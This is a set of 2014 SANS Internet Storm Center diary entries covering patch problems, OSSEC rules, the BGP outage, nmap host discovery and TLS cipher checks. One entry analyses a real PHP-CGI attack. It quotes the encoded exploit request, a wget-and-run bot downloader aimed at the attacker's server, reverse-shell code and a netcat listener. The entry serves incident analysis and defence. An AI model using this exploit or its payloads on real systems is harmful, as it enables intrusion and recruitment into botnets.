|       184.171.166.72 seen 923 times. last tx was unicast v2 mode 7

|       94.23.230.186 seen 96 times. last tx was unicast v2 mode 7

… total of 166 entries

 

This is where I will end the story for now. What do you think is happening?  Conclusion Tuesday August 19th.

-- Rick Wanner - rwanner at isc dot sans dot edu- http://namedeplume.blogspot.com/ - Twitter:namedeplume (Protected)

2 Comments

Published: 2014-08-16

Issues with Microsoft Updates

Microsoft has updated some bulletins because there are three known issues that can affect your computer.

  • when KB2982791 is installed, fonts that are installed in a location other than the default fonts directory (%windir%\fonts\) cannot be changed when they are loaded into any active session
  • Fonts do not render correctly after any of the following updates are installed:
    • 2982791 MS14-045: Description of the security update for kernel-mode drivers: August 12, 2014
    • 2970228 Update to support the new currency symbol for the Russian ruble in Windows
    • 2975719 August 2014 update rollup for Windows RT 8.1, Windows 8.1, and Windows Server 2012 R2
    • 2975331 August 2014 update rollup for Windows RT, Windows 8, and Windows Server 2012
  • Microsoft is investigating behavior in which systems may crash with a 0x50 Stop error message (bugcheck) after any of the following updates are installed:
    • 2982791 MS14-045: Description of the security update for kernel-mode drivers: August 12, 2014
    • 2970228 Update to support the new currency symbol for the Russian ruble in Windows
    • 2975719 August 2014 update rollup for Windows RT 8.1, Windows 8.1, and Windows Server 2012 R2
    • 2975331 August 2014 update rollup for Windows RT, Windows 8, and Windows Server 2012

If you have not yet installed these updates, please don't install them until Microsoft publishes a fix. If you have already installed them, please check each KB article for mitigation measures.
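As a quick way to see whether the problem kernel-mode update is present on a box, and (per Microsoft's mitigation guidance at the time - double-check the KB articles for the current recommendation) to remove it, both commands below are standard Windows tools:

wmic qfe get hotfixid | find "KB2982791"
wusa /uninstall /kb:2982791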

Manuel Humberto Santander Peláez
SANS Internet Storm Center - Handler
Twitter:@manuelsantander
Web:http://manuel.santander.name
e-mail: msantand at isc dot sans dot org

9 Comments

Published: 2014-08-16

Web Server Attack Investigation - Installing a Bot and Reverse Shell via a PHP Vulnerability

With Windows malware getting so much attention nowadays, it's easy to forget that attackers also target other OS platforms. Let's take a look at a recent attempt to install an IRC bot written in Perl by exploiting a vulnerability in PHP.

The Initial Probe

The web server received the initial probe from 46.41.128.231, an IP address that at the time was not flagged as malicious on various blocklists:

HEAD / HTTP/1.0

The connection lacked the headers typically present in an HTTP request, which is why the web server's firewall blocked it with a 403 Forbidden HTTP status code. However, that response was sufficient for the attacker's tool to confirm that it had located a web server.

The Exploitation Attempt

The offending IP address initiated another connection to the web server approximately 4 hours later. This time, the request was less gentle than the initial probe:

POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25
Content-Type: application/x-www-form-urlencoded

As shown above, the attacking system attempted to access /cgi-bin/php on the targeted server. The parameter supplied to /cgi-bin/php, when converted from hexadecimal into ASCII, corresponded to this:

-dallow_url_include=on-dsafe_mode=off-dsuhosin.simulation=on-ddisable_functions=""-dopen_basedir=none-dauto_prepend_file=php://input-dcgi.force_redirect=0-dcgi.redirect_status_env=0-n

These parameters, when supplied to a vulnerable version of /cgi-bin/php, are designed to dramatically reduce security of the PHP configuration on the system. We covered a similar pattern in our 2012 diary when describing the CVE-2012-1823 vulnerability in PHP. The fix to that vulnerability was poorly implemented, which resulted in the CVE-2012-2311 vulnerability that affected "PHP before 5.3.13 and 5.4.x before 5.4.3, when configured as a CGI script," according to MITRE. The ISS advisory noted that,

"PHP could allow a remote attacker to execute arbitrary code on the system, due to an incomplete fix for an error related to parsing PHP CGI configurations. An attacker could exploit this vulnerability to execute arbitrary code on the system."

SpiderLabs documented a similar exploitation attempt in 2013, where they clarified that "one of the key modifications is to specify 'auto_prepend_file=php://input' which will allow the attacker to send PHP code in the request body."

The Exploit's Primary Payload: Downloading a Bot

With the expectation that the initial part of the malicious POST request reconfigured PHP, the body of the request began with the following code:

<?php system("wget ip-address-redacted/speedtest/.a/hb/phpR05 -O /tmp/.bash_h1s7;perl /tmp/.bash_h1s7;rm -rf /tmp/.bash_h1s7 &"); ?>

If the exploit was successful, code would direct the targeted server to download /.a/hb/phpR05 from the attacker's server, saving the file as /tmp/.bash_h1s7, then running the file using Perl and then deleting the file. Searching the web for "phpR05" showed a file with this name being used in various exploitation attempts. One such example was very similar to the incident being described in this diary. (In a strange coincidence, that PHP attack was visible in the data that the server was leaking due to a Heartbleed vulnerability!)

The malicious Perl script was an IRC bot, and was recognized as such by several antivirus tools according to VirusTotal. Here's a tiny excerpt from its code:

#####################
# Stealth Shellbot  #
#####################

sub getnick {
  return "Rizee|RYN|05|".int(rand(8999)+1000);
}

This bot was very similar to the one described by James Espinosa in 2013 in an article discussing Perl/ShellBot.B trojan activity, which began with attempts to exploit a phpMyAdmin file inclusion vulnerability.

The Exploit's Secondary Payload: Reverse Shell

In addition to supplying instructions to download the IRC bot, the malicious POST request contained PHP code that implemented a reverse backdoor, directing the targeted web server to establish a connection to the attacker's server on TCP port 22. That script began like this:

$ip = 'ip-address-redacted';
$port = 22;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'unset HISTFILE; unset HISTSIZE; uname -a; w; id; /bin/sh -i';

Though the attacker specified port 22, the reverse shell didn't use SSH. Instead, it expected the attacker's server to listen on that port using a simple tool such as Netcat. Experimenting with this script and Netcat in a lab environment confirmed this, as shown in the following screenshot:

In this laboratory experiment, 'nc -l -p 22' directed Netcat to listen for connections on TCP port 22. Once the reverse shell script ran on the system that mimicked the compromised server, the simulated attacker had the ability to run commands on that server (e.g., 'whoami').

Interestingly, the production server's logs showed that the system in the wild was listening on TCP port 22; however, it was actually running SSH there, so the reverse shell connection established by the malicious PHP script would have failed.

A bit of web searching revealed a script called ap-unlock-v1337.py, reportedly written in 2012 by "noptrix," which was designed to exploit the PHP vulnerability outlined above. That script included the exact exploit code used in this incident and included the code that implemented the PHP-based reverse shell. The attacker probably used that script with the goal of installing the Perl-based IRC bot, ignoring the reverse shell feature of the exploit.

Wrap Up

The attack, probably implemented using an automated script that probed random IP addresses, was designed to build an IRC-based bot network. It targeted Unix systems running a version of PHP susceptible to a 2-year-old vulnerability. This recent incident suggests that there are still plenty of unpatched systems left to compromise. The attacker used an off-the-shelf exploit and an unrelated off-the-shelf bot, both of which were readily available on the Internet. The attacker's infrastructure included 3 different IP addresses, none of which were blocklisted at the time of the incident.

-- Lenny Zeltser

Lenny Zeltser focuses on safeguarding customers' IT operations at NCR Corp. He also teaches how to analyze malware at SANS Institute. Lenny is active on Twitter and also writes a security blog, where he recently described other attacks observed on a web server.

1 Comments

Published: 2014-08-15

AppLocker Event Logs with OSSEC 2.8

In a previous post, Monitoring Windows Networks Using Syslog, I discussed using syslog to send the event logs to a SIEM. This post covers another technique for collecting event log data for analysis.

A new version of OSSEC (2.8) has been released that includes the ability, on Windows, to access the event channels that were introduced in Vista. To get this to work correctly, I had to have both the agent and the server on 2.8. This new capability allows admins to send some of the more interesting event logs to OSSEC in a very easy way.

Client Config

Setting up the config for the subscription is quite easy.  If you want to do it on a per-install basis, edit C:\Program Files\ossec-agent\ossec.conf.  Add a new localfile tag, then under location put the XPath channel name, and set the log_format to eventchannel.
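As a rough sketch, the entry looks like this; the channel shown is one of the AppLocker channels and is only an example, so substitute whichever channels you actually care about:

<localfile>
  <location>Microsoft-Windows-AppLocker/EXE and DLL</location>
  <log_format>eventchannel</log_format>
</localfile>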

 

​

 

If you want this config to be pushed out to all your Windows systems centrally, you should add the config below to /var/ossec/etc/shared/agent.conf on the server. This file has an added XML attribute for matching which systems should apply the config.
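A hedged sketch of what that centrally pushed block might look like (the os attribute value and the channel name are examples; adjust both to your environment):

<agent_config os="Windows">
  <localfile>
    <location>Microsoft-Windows-AppLocker/EXE and DLL</location>
    <log_format>eventchannel</log_format>
  </localfile>
</agent_config>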


 

 

Creating Rules

Once you get the logs, you need to create rules to generate alerts.  When creating the rules, you need to know what event level (e.g. Information, Error, etc.) each event is logged with.  To get a detailed list of the events, follow this link (hxxp://technet.microsoft.com/en-us/library/ee844150(v=ws.10).aspx)

 

When creating your own rules, you should always add them to the local_rules.xml file to make sure they do not get overwritten by updates.  These rules should start at rule ID 100000.
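As an illustration only, a blocked-application rule might look roughly like the following; the parent rule ID and the match string are assumptions on my part, so use the rules on my github (linked below) rather than this sketch:

<group name="windows,applocker,">
  <rule id="100021" level="10">
    <if_sid>18100</if_sid>
    <match>was prevented from running</match>
    <description>AppLocker blocked an application from running.</description>
  </rule>
</group>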

 

 

 

I’ve posted all my AppLocker rules to my github (hxxps://github.com/tcw3bb/ISC_Posts/blob/master/OSSEC_AppLocker_Local_Rule.xml), and I’ve also submitted them to the OSSEC group to be added in the next version.  When using the local rules, you may need to change the rule IDs for your environment.  

RAW Log

Once you have the rules in place, alerts like the ones below should be created.

Quick report

To get a report for the current day of who had blocked apps, you can run the following:

cat /var/ossec/logs/alerts/alerts.log | /var/ossec/bin/ossec-reportd -f rule 100021 -s

 

I also have nxlog and eventsys client configs on my github (hxxps://github.com/tcw3bb/ISC_Posts).  To use these with OSSEC, you will need a different parser and rules.  

--

Tom Webb

1 Comments

Published: 2014-08-14

PHP 5.3.29 is available, PHP 5.3 reaching end of life

The PHP development team announces the immediate availability of PHP 5.3.29. This release marks the end of life of the PHP 5.3 series. Future releases of this series are not planned. All PHP 5.3 users are encouraged to upgrade to the current stable version of PHP 5.5 or previous stable version of PHP 5.4, which are supported till at least 2016 and 2015 respectively.

PHP 5.3.29 contains about 25 potentially security related fixes backported from PHP 5.4 and 5.5.

For source downloads of PHP 5.3.29, please visit our downloads page. Windows binaries can be found on windows.php.net/download/. The list of changes is recorded in the ChangeLog.

For helping your migration to newer versions please refer to our migration guides for updates from PHP 5.3 to 5.4 and from PHP 5.4 to 5.5.

http://php.net/

0 Comments

Published: 2014-08-14

Threats to virtual environments

In the past few years the virtualization concept has become very popular. A new study by Symantec [1] discusses threats to virtual environments and suggests best practices to minimize the risk.

The study shows the new security challenges that come with virtual environments, such as network traffic that may not be monitored by services such as IDS or DLP.    

The paper covers how malware behaves in virtual environments. One example of malware that targets virtual machines is W32.Crisis. This malware doesn't exploit any specific vulnerability; basically, it takes advantage of how virtual machines are stored on the host system. A virtual machine is stored as a set of files on the storage, and those files can be manipulated or mounted with free tools.

The study also addresses using VMs for malicious code analysis; for example, in some cases when malicious code detects that it is running in a virtual machine, it will send false data, such as trying to connect to its C&C with a wrong IP.  The study shows that the amount of malware that detects VMware has increased in the past couple of years. For more reliable results, the study suggests that security researchers should use physical hardware in a controlled network instead of virtual machines.  

The last section of the paper suggests best practices to secure the virtual environment.

[1] http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/threats_to_virtual_environments.pdf

0 Comments

Published: 2014-08-13

Updates for Apple Safari

Apple today released updates for Safari 6.x and 7.x . The patches fix 7 vulnerabilities and are available for versions of OS X back to 10.7.5 (Lion). [1]

The bulletin released by Apple is very vague and only talks about "memory corruption issues" but states that some of these vulnerabilities may lead to arbitrary code execution. The vulnerabilities affect WebKit, Apple's browser library, and may affect other products as well.

With this update, the latest versions of Safari are 6.1.6 and 7.0.6.

[1] http://support.apple.com/kb/HT6367

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

0 Comments

Published: 2014-08-12

Adobe updates for 2014/08

Adobe has released security updates for Adobe Flash Player, Adobe AIR, Adobe Reader, and Acrobat. The updates are rated as critical and address an impressive number of CVE entries: CVE-2014-0538, CVE-2014-0540, CVE-2014-0541, CVE-2014-0542, CVE-2014-0543, CVE-2014-0544, CVE-2014-0545, CVE-2014-0546. Summary: update now. 

http://helpx.adobe.com/security/products/flash-player/apsb14-18.html
http://helpx.adobe.com/security/products/reader/apsb14-19.html

Cheers,
Adrien de Beaupré
Intru-shun.ca Inc.
My SANS Teaching Schedule

 

 

0 Comments

Published: 2014-08-12

Something is amiss with the Interwebs! BGP is a flapping.

[Update] See http://www.bgpmon.net/what-caused-todays-internet-hiccup/ for a good summary of what happened.

 

Tuesday morning, various networks experienced outages from 4-6am EDT (8-10am UTC) [1]. It appears the outage was the result of a somewhat anticipated problem with older routers and their inability to deal with the ever-increasing size of the Internet's routing table.

These BGP routers need to store a map of the Internet defining which IP address range belongs to which network. Due to the increasing scarcity of IPv4 space, registrars and ISPs assign smaller and smaller netblocks to customers, leading to a more and more fragmented topology. Many older routers are limited to storing 512k entries, and the Internet's routing table has become large enough to reach this limit. Tuesday morning, it appears to have exceeded this limit for a short time [2][3].

The large number of route announcements and immediate removals shown in [2] could indicate malicious intent behind these events (or a simple configuration error), but either way they likely point to one entity "pushing" the size of the routing table beyond the 512k limit briefly. At around this time, one larger ISP (Windstream, AS7029) recovered from an unrelated outage, and routing changes due to the recovery are one suspected trigger for the event.

Vendors have published guidance for users of older routers on how to avoid this issue [5]. This guidance has been available for a while. Please contact your vendor if you are affected. You may also want to consider upgrading your router. The routing table is likely going to get larger over the next few years, until networks rely less on IPv4 and take advantage of IPv6.
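If you are wondering how close your own edge router is to the limit, comparing the global table size to your platform's capacity is easy enough; on a Cisco IOS box, for example, the following show commands give a quick read (the 6500/Sup720-specific TCAM checks and reallocation steps are covered in the vendor guidance in [5]):

show ip route summary   ! total prefixes currently installed in the routing table
show ip bgp summary     ! per-neighbor prefix counts and BGP table version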

 

[1] https://puck.nether.net/pipermail/outages/2014-August/007090.html
[2] http://www.cymru.com/BGP/prefix_delta.html (see the spike in deltas around that time)
[3] 
http://www.cidr-report.org/2.0/#General_Status  (note how close it is to 512k and rising)
[4] 
http://www.thewhir.com/web-hosting-news/liquidweb-among-companies-affected-major-outage-across-us-network-providers
[5] http://www.cisco.com/c/en/us/support/docs/switches/catalyst-6500-series-switches/117712-problemsolution-cat6500-00.html
 

Cheers,
Adrien de Beaupré
Intru-shun.ca Inc.
My SANS Teaching Schedule

2 Comments

Published: 2014-08-12

Microsoft Patch Tuesday - August 2014

Overview of the August 2014 Microsoft patches and their status.

# Affected Contra Indications - KB Known Exploits Microsoft rating(**) ISC rating(*)
clients servers
MS14-043 Vulnerability in Windows Media Center Could Allow Remote Code Execution
Microsoft Windows

CVE-2014-4060
KB 2978742 No Severity:Critical
Exploitability: 1
Critical Important
MS14-044 Vulnerabilities in SQL Server Could Allow Elevation of Privilege
Microsoft SQL Server

CVE-2014-1820
CVE-2014-4061
KB 2984340 No Severity:Important
Exploitability: 1
Important Important
MS14-045 Vulnerabilities in Kernel-Mode Drivers Could Allow Elevation Of Privilege
Microsoft Windows

CVE-2014-0318
CVE-2014-1819
CVE-2014-4064
KB 2984615 No Severity:Important
Exploitability: 1
Important Important
MS14-046 Vulnerability in .NET Framework Could Allow Security Feature Bypass
Microsoft Windows,Microsoft .NET Framework

CVE-2014-4062
KB 2984625 No Severity:Important
Exploitability: 1
Important Important
MS14-047 Vulnerability in LRPC Could Allow Security Feature Bypass
Microsoft Windows

CVE-2014-0316
KB 2978668 No Severity:Important
Exploitability: 1
Important Important
MS14-048 Vulnerability in OneNote Could Allow Remote Code Execution
Microsoft Office

CVE-2014-2815
KB 2977201 No Severity:Important
Exploitability: 1
Critical Important
MS14-049 Vulnerability in Windows Installer Service Could Allow Elevation of Privilege
Microsoft Windows

CVE-2014-1814
KB 2962490 No Severity:Important
Exploitability: 1
Important Important
MS14-050 Vulnerability in Microsoft SharePoint Server Could Allow Elevation of Privilege
Microsoft Server Software

CVE-2014-2816
KB 2977202 No Severity:Important
Exploitability: 1
Important Important
MS14-051 Cumulative Security Update for Internet Explorer
Microsoft Windows, Internet Explorer

CVE-2014-2774 CVE-2014-2784 CVE-2014-2796 CVE-2014-2808 CVE-2014-2810 CVE-2014-2811 CVE-2014-2817 CVE-2014-2818 CVE-2014-2819 CVE-2014-2820 CVE-2014-2821 CVE-2014-2822 CVE-2014-2823 CVE-2014-2824 CVE-2014-2825 CVE-2014-2826 CVE-2014-2827 CVE-2014-4050 CVE-2014-4051 CVE-2014-4052 CVE-2014-4055 CVE-2014-4056 CVE-2014-4057 CVE-2014-4058 CVE-2014-4063 CVE-2014-4067
KB 2976627 Yes! Severity:Critical
Exploitability: 1
Critical Important
We will update issues on this page for about a week or so as they evolve.
We appreciate updates.
US based customers can call Microsoft for free patch related support on 1-866-PCSAFETY
(*): ISC rating
  • We use 4 levels:
    • PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
    • Critical: Anything that needs little to become "interesting" for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.
    • Important: Things where more testing and other measures can help.
    • Less Urgent: Typically a vulnerability whose exposure is reduced by common best practices, such as not using Outlook, MSIE, Word etc. on servers to do traditional office or leisure work.
    • The rating is not a risk analysis as such. It is a rating of the importance of the vulnerability and the perceived or even predicted threat.

--
Alex Stanford - GIAC GWEB & GIAC GSEC
Research Operations Manager,
SANS Internet Storm Center

8 Comments

Published: 2014-08-12

Host discovery with nmap

I enjoy performing penetration tests, and I also enjoy teaching how to do penetration testing correctly. Next up is SANS Sec560, Network Penetration Testing, in Albuquerque, NM. One of the points I make when teaching is to make good use of your tools. You really want to know which tool is appropriate for which parts of the engagement methodology and test plan. You also want to be familiar with the features and quirks of each tool in your kit. Most people are familiar with nmap as a port scanner, and often with some of its other features such as service versioning and operating system fingerprinting. What I would like to talk about today are some of the features of nmap that work well together. One of the tasks in a penetration test or a vulnerability assessment is to identify which hosts are likely alive and responsive. Security testing involves sending stimulus, monitoring, and observing responses. In this case we typically use nmap to send the stimulus and tcpdump to perform the monitoring; the responses tell us which hosts are responding to the packets nmap is sending.

Nmap is most often used to perform a ping sweep with its default series of packets. This option was -sP and is now -sn.

'nmap -sn -iL targets -oA nmap-default-ping'

With root privileges this will send an ICMP echo request (ping), a TCP SYN packet to port 443, a TCP ACK packet to port 80, and an ICMP timestamp request. This is efficient and in many cases sufficient to identify the hosts that are responsive, particularly on a relatively flat internal network.

Tcpdump shows us that 4 packets were sent and 4 responses were seen.

17:08:37.469613 IP 198.41.30.84 > 74.207.244.221: ICMP echo request, id 44412, seq 0, length 8
17:08:37.469641 IP 198.41.30.84.42601 > 74.207.244.221.443: Flags [S], seq 4035393928, win 1024, options [mss 1460], length 0
17:08:37.469658 IP 198.41.30.84.42601 > 74.207.244.221.80: Flags [.], ack 4035393928, win 1024, length 0
17:08:37.469664 IP 198.41.30.84 > 74.207.244.221: ICMP time stamp query id 30952 seq 0, length 20
17:08:37.541827 IP 74.207.244.221 > 198.41.30.84: ICMP echo reply, id 44412, seq 0, length 8
17:08:37.541841 IP 74.207.244.221.443 > 198.41.30.84.42601: Flags [R.], seq 0, ack 4035393929, win 0, length 0
17:08:37.541868 IP 74.207.244.221.80 > 198.41.30.84.42601: Flags [R], seq 4035393928, win 0, length 0
17:08:37.541968 IP 74.207.244.221 > 198.41.30.84: ICMP time stamp reply id 30952 seq 0: org 00:00:00.000, recv 21:00:18.026, xmit 21:00:18.026, length 20

(74.207.244.221 is scan.nmap.org)

The problem with sending only these 4 packets for host discovery is that it may miss many test cases, and is therefore less accurate. This is an issue in many pentests, where we need to balance accuracy against efficient use of our time. Scanning an arbitrary /19, we see the following results:

Nmap done: 8192 IP addresses (5668 hosts up) scanned in 24.31 seconds
           Raw packets sent: 26981 (968.952KB) | Rcvd: 5954 (176.168KB)

Now consider the following:
 'nmap -sn -PS -PA -PU -PY -PE -PP -PM -PO -n -vv --reason --packet-trace --traceroute -iL targets -oA nmap-full-sweep'
 
Nmap done: 8192 IP addresses (5676 hosts up) scanned in 438.24 seconds
           Raw packets sent: 80075 (2.518MB) | Rcvd: 94752 (4.014MB)

The --reason option tells us which stimulus each host responded to. --packet-trace prints the packets flying back and forth to the screen, giving us a visual indicator that the tests are running correctly. The second scan sends 3 different ICMP packet types, as well as TCP, UDP, SCTP, and some raw IP packets. The only other tool I often run along with nmap is ike-scan, to identify VPN devices that do not respond to any other packets (see the example after the excerpt below). From the nmap man page:
-sn: Ping Scan - disable port scan
-PS/PA/PU/PY[portlist]: TCP SYN/ACK, UDP or SCTP discovery to given ports
-PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes
-PO[protocol list]: IP Protocol Ping
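
A typical ike-scan sweep of the same target list might look like the following; -M simply asks for multi-line output and -f reads the targets from a file (both per the ike-scan documentation, verify on your version):

'ike-scan -M -f targets'

Any host that answers the IKE handshake is almost certainly a VPN gateway, even if it ignored every packet nmap sent.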

We gained an additional 8 hosts identified as responsive; however, we sent over 3 times as many packets and it took much, much longer. The second scan is arguably much more accurate, and certainly is a much more impressive command line! Putting the tools together, we can construct a nice bash script to run tcpdump and nmap against a target list. The script checks to see if it has root privileges, sets up some variables, creates a scan log, runs tcpdump, runs nmap, then stops tcpdump.

Cheers,
Adrien de Beaupre
Intru-shun.ca Inc.

Check out BSides Ottawa, our CfP is still open! Con is 5-6 September
http://www.bsidesottawa.ca/
I will be teaching SANS Sec560, Network Penetration Testing next in Albuquerque, NM!
http://www.sans.org/event/albuquerque-2014/course/network-penetration-testing-ethical-hacking

References:
http://nmap.org/book/man-host-discovery.html
http://www.nta-monitor.com/tools-resources/security-tools/ike-scan

Begin script:

#!/bin/bash
#Usage: discover.sh targetfilename
# Modified 10 August 2014, Adrien de Beaupre
# Check to see if we have root privileges, exit if not.
if [[ $EUID -ne 0 ]]; then
        echo "$0 must be run as root"
        exit 1
fi
# Check to see if we have a filename as one argument, exit if not.
# Number of arguments we want
GOODARGS=1
if [ $# -ne $GOODARGS ]; then
        echo "Usage: `basename $0` {targetfilename}"
        exit 1
fi
# Check to see if target file exists, exit if not
if [ ! -f "$1" ]; then
        echo "Target file \"`basename $1`\" does not exist"
        exit 1
fi
# Declare variables
# Target file
TARGETS=`cat $1`
# Timestamp variable
NOW=$(date +%F-%s)
# Tcpdump program to run variable
TCPDUMP=/usr/local/sbin/tcpdump
# Run the tcpdump program
$TCPDUMP -n -v -i eth0 -w tcpdump-discovery.$NOW.$1.dump 2>/dev/null &
# Variable for the process ID
PID=$!
# Start discovery scan, create or append to scanlog
echo -e 'Discovery scan start:' $HOSTNAME | tee -a scanlog
date >> scanlog
# Nmap discovery
nmap -sn -PS -PA -PU -PY -PE -PP -PM -PO -n -vv --reason --packet-trace --traceroute -iL $1 -oA $1-discovery-nmap-$NOW
# Wait two seconds before killing sniffer
sleep 2
# Kill the tcpdump program by PID
echo -e 'Tcpdump stopped:' $HOSTNAME | tee -a scanlog
date >> scanlog
kill $PID
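
To run it, pass the target file as the only argument (the file name below is just an example) and use root privileges so nmap can send raw probes and tcpdump can sniff:

sudo ./discover.sh targets.txt

You end up with the nmap output in the three -oA formats plus a pcap of everything sent and received, which is handy evidence to keep with your engagement notes.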

2 Comments

Published: 2014-08-11

Verifying preferred SSL/TLS ciphers with Nmap

In the last year or two, there has been a lot of talk regarding correct usage of SSL/TLS ciphers on web servers. Due to various more or less known incidents, web sites today should use PFS (Perfect Forward Secrecy), a mechanism that is used when an SSL/TLS connection is established and symmetric keys are exchanged. PFS ensures that, in case an attacker obtains the server’s private key, he cannot decrypt previous SSL/TLS connections to that server. If PFS is not used (if RSA is used to exchange symmetric keys), then the attacker can easily decrypt *all* previous SSL/TLS connections. That’s bad.

However, the whole process of choosing a cipher is not all that trivial. By default, the client presents its preferred cipher, and as long as the server supports that cipher it will be selected. This is, obviously, not optimal in environments where we want to be sure that the most secure cipher will always be selected, so administrators quite often configure their servers so that the server gets to pick the preferred cipher.

This allows an administrator to enable only the ciphers he wants to be used, and additionally to define their priorities – the server will always try to pick the cipher with the highest priority (which should be “the most secure one”). Only if the client does not support that cipher will the server move to the next one, and so on, until it finds one that is supported by the client (or, if it doesn’t, the SSL/TLS connection will fail!).

This is good, and therefore I started recommending that web server administrators configure their servers so that PFS ciphers are turned on. However, on several occasions I noticed that the administrators had incorrectly set the preferred cipher suite order on the server. This can result in non-PFS cipher suites being selected, although both the server and the client support PFS.

As mentioned previously, this happens because the client sends the list of the supported ciphers and the server picks "the strongest one" according to its preferred list.
SSL Labs (https://www.ssllabs.com/ssltest) shows this when testing with reference browsers, but I wanted to be able to check this myself, from the command line, especially when I'm testing servers that are not reachable by SSL Labs (or I don't want them to see the results).
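
A crude way to spot-check a single case from the command line is to offer the server a restricted cipher list with openssl s_client and see which suite it selects; the host and cipher names below are only an example, and the chosen suite shows up on the "Cipher" lines of the output:

$ openssl s_client -connect www.example.com:443 -cipher 'AES128-SHA:DHE-RSA-AES128-SHA' < /dev/null 2>/dev/null | grep Cipher

That only tests one offered list per run though, which gets tedious quickly.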

So I modified Nmap's ssl-enum-ciphers.nse script to list preferred ciphers in addition to just enumerating ciphers. I use this script a lot to list the supported ciphers, but I was missing the preferred cipher order. Let’s take a look at the following example:

$ nmap -sT -PN -p 443 127.0.0.1 --script ssl-enum-ciphers.nse
Starting Nmap 6.46 ( http://nmap.org ) at 2014-08-11 09:15 UTC
Nmap scan report for 127.0.0.1
Host is up (0.00021s latency).
PORT    STATE SERVICE
443/tcp open  https
| ssl-enum-ciphers:
|   SSLv3: No supported ciphers found
|   TLSv1.0:
|     ciphers:
|       TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA - strong
|       TLS_DHE_RSA_WITH_AES_128_CBC_SHA - strong
|       TLS_DHE_RSA_WITH_AES_256_CBC_SHA - strong
|       TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA - strong
|       TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA - strong
|       TLS_RSA_WITH_3DES_EDE_CBC_SHA - strong
|       TLS_RSA_WITH_AES_128_CBC_SHA - strong
|       TLS_RSA_WITH_AES_256_CBC_SHA - strong
|       TLS_RSA_WITH_CAMELLIA_128_CBC_SHA - strong
|       TLS_RSA_WITH_CAMELLIA_256_CBC_SHA - strong

|     preferred ciphers order:
|       TLS_RSA_WITH_AES_128_CBC_SHA
|       TLS_DHE_RSA_WITH_AES_128_CBC_SHA
|       TLS_DHE_RSA_WITH_AES_256_CBC_SHA
|       TLS_RSA_WITH_AES_256_CBC_SHA
|       TLS_RSA_WITH_3DES_EDE_CBC_SHA
|       TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA
|       TLS_RSA_WITH_CAMELLIA_256_CBC_SHA
|       TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA
|       TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA
|       TLS_RSA_WITH_CAMELLIA_128_CBC_SHA

|     compressors:
|       NULL

Now, things get interesting. You can see that the server supports the PFS ciphers (those starting with TLS_DHE) in the list of supported ciphers. However, take a look at the preferred cipher order. Since TLS_RSA_WITH_AES_128_CBC_SHA is the cipher preferred by the server, absolutely every browser today (Mozilla, Chrome, IE, Safari) will end up using this cipher – since they all support it. So, even though PFS ciphers are enabled, they will never get used!

Of course, this is an error in the web server’s configuration. Let’s fix it so the PFS ciphers have higher priority and rerun the nmap script:

$ nmap -sT -PN -p 443 127.0.0.1 --script ssl-enum-ciphers.nse
Starting Nmap 6.46 ( http://nmap.org ) at 2014-08-11 09:15 UTC
Nmap scan report for 127.0.0.1
Host is up (0.00021s latency).
PORT    STATE SERVICE
443/tcp open  https
| ssl-enum-ciphers:
|   SSLv3: No supported ciphers found
|   TLSv1.0:
|     ciphers:
|       TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA - strong
|       TLS_DHE_RSA_WITH_AES_128_CBC_SHA - strong
|       TLS_DHE_RSA_WITH_AES_256_CBC_SHA - strong
|       TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA - strong
|       TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA - strong
|       TLS_RSA_WITH_3DES_EDE_CBC_SHA - strong
|       TLS_RSA_WITH_AES_128_CBC_SHA - strong
|       TLS_RSA_WITH_AES_256_CBC_SHA - strong
|       TLS_RSA_WITH_CAMELLIA_128_CBC_SHA - strong
|       TLS_RSA_WITH_CAMELLIA_256_CBC_SHA - strong

|     preferred ciphers order:
|       TLS_DHE_RSA_WITH_AES_128_CBC_SHA
|       TLS_DHE_RSA_WITH_AES_256_CBC_SHA
|       TLS_RSA_WITH_AES_128_CBC_SHA
|       TLS_RSA_WITH_AES_256_CBC_SHA
|       TLS_RSA_WITH_3DES_EDE_CBC_SHA
|       TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA
|       TLS_RSA_WITH_CAMELLIA_256_CBC_SHA
|       TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA
|       TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA
|       TLS_RSA_WITH_CAMELLIA_128_CBC_SHA

|     compressors:
|       NULL

Much better! Now the PFS ciphers are preferred and most browsers will use them. We can even confirm this with SSL Labs – all relatively new browsers that support PFS will pick those ciphers.
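
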